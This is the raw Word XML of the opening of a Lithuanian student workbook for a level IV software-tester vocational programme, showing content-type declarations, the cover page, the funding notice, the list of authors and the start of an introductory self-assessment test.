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activeX/activeX21.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX21.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX22.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX22.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX23.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX23.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX24.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX24.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX25.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX25.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX26.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX26.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX27.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX27.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX28.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX28.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX29.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX29.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX30.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX30.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX31.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX31.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX32.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX32.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX33.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX33.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX34.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX34.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX35.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX35.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX36.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX36.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX37.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX37.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX38.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX38.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX39.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX39.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX40.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX40.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX41.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX41.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX42.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX42.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX43.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX43.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX44.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX44.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX45.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX45.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX46.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX46.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX47.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX47.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX48.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX48.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX49.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX49.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX50.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX50.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX51.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX51.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX52.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX52.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX53.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX53.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX54.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX54.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX55.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX55.bin" ContentType="application/vnd.ms-office.activeX"/>
  <Override PartName="/word/activeX/activeX56.xml" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/activeX/activeX56.bin" ContentType="application/vnd.ms-office.activeX"/>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577D" w:rsidRDefault="00DD577D" w:rsidP="00DD577D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD577D" w:rsidRDefault="00DD577D" w:rsidP="00DD577D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5897880" cy="932815"/>
                <wp:effectExtent l="0" t="0" r="0" b="635"/>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97880" cy="932815"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6939" cy="1098"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="3" name="Picture 48" descr="cid:image001.jpg@01D40F86.D718AD6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2868" y="246"/>
                            <a:ext cx="4071" cy="67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32" cy="109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A05DBDC" id="Group 2" o:spid="_x0000_s1026" style="width:464.4pt;height:73.45pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6939,10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">
                <v:shape id="Picture 48" o:spid="_x0000_s1027" type="#_x0000_t75" alt="cid:image001.jpg@01D40F86.D718AD60" style="position:absolute;left:2868;top:246;width:4071;height:6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">
                  <v:imagedata r:id="rId11" r:href="rId12"/>
                </v:shape>
                <v:shape id="Picture 49" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;width:2532;height:1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">
                  <v:imagedata r:id="rId13" o:title=""/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00DD577D">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="070809"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00DD577D">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="070809"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006D6D69" w:rsidRDefault="006D6D69" w:rsidP="00DD577D">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="070809"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006D6D69" w:rsidRDefault="006D6D69" w:rsidP="00DD577D">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="070809"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00DD577D">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="070809"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AD4464" w:rsidP="00DD577D">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007376DF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Programinės įrangos testuotojo modulinė profesinio mokymo programa, </w:t>
      </w:r>
      <w:r w:rsidR="00134AE6" w:rsidRPr="007376DF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IV</w:t>
      </w:r>
      <w:r w:rsidRPr="007376DF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> lygis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00DD577D">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="070809"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00DD577D">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="070809"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006D6D69" w:rsidRDefault="006D6D69" w:rsidP="00DD577D">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="070809"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00DD577D">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="070809"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD577D" w:rsidRDefault="00AD4464" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="070809"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="070809"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Teorinių ir praktinių užduočių</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AD4464" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="070809"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="070809"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>mokinio sąsiuvinis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="070809"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F22614" w:rsidRPr="003005E7" w:rsidRDefault="00B7488E" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003005E7">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_Toc14787736"/>
      <w:bookmarkStart w:id="2" w:name="_Toc10443950"/>
      <w:bookmarkStart w:id="3" w:name="_Toc13095499"/>
      <w:bookmarkStart w:id="4" w:name="_Toc13833394"/>
      <w:bookmarkStart w:id="5" w:name="_Toc14392412"/>
      <w:bookmarkStart w:id="6" w:name="_Toc495928181"/>
    </w:p>
    <w:p w:rsidR="00F22614" w:rsidRDefault="00F22614" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD577D" w:rsidRDefault="00DD577D" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AD4464" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Teorinių ir praktinių užduočių mokinio sąsiuvinis </w:t>
      </w:r>
      <w:r w:rsidR="006637E8">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">parengtas </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>įgyvendinant iš Europos Sąjungos struktūrinių fondų lėšų bendrai finansuojamą projektą „Lietuvos kvalifikacijų sistemos plėtra (I etapas)“ (projekto Nr. 09.4.1-ESFA-V-734-01-0001).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AD4464" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Teorinių ir praktinių užduočių mokinio sąsiuvinio (</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Programinės įrangos testuotojo modulinė profe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sinio mokymo programa, IV lygis) autoriai patvirtina, kad šiame teorinių ir praktinių užduočių mokinio sąsiuvinyje pateiktos užduotys nepažeis autorių, kurių kūriniai naudojami, teisių ir visa užduotims rengti ir iliustruoti naudota literatūra ir šaltiniai yra pateikti sąsiuvinio gale.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD577D" w:rsidRDefault="00DD577D" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD577D" w:rsidRDefault="00DD577D" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AD4464" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E217AA">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Teorinių ir praktinių užduočių mokinio sąsiuvinio autoriai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AD4464" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E217AA">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Virginija Putnaitė</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AD4464" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E217AA">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Laura Vaišnorė</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AD4464" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E217AA">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Rita Daukšienė </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AD4464" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E217AA">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Jaroslav Grablevski</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AD4464" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E217AA">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Jolita Bačkienė</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AD4464" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E217AA">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Justina Balsė</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AD4464" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E217AA">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Konsultantai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00EF5DDF" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E217AA">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Renata Čičman</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:ind w:right="282"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="007376DF" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:ind w:right="282"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:caps/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00AD4464" w:rsidRPr="009E0C97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Modulis „Ivadas į profesiją“</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00EA3A96" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:ind w:left="576" w:right="282" w:hanging="576"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc14392413"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">TESTAS </w:t>
      </w:r>
      <w:r w:rsidR="00263404" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ĮSIVERTINTI </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">GEBĖJIMAMS </w:t>
      </w:r>
      <w:r w:rsidR="00263404" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>PRIEŠ PRADEDANT MOKYTIS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:bookmarkEnd w:id="6"/>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00713028" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
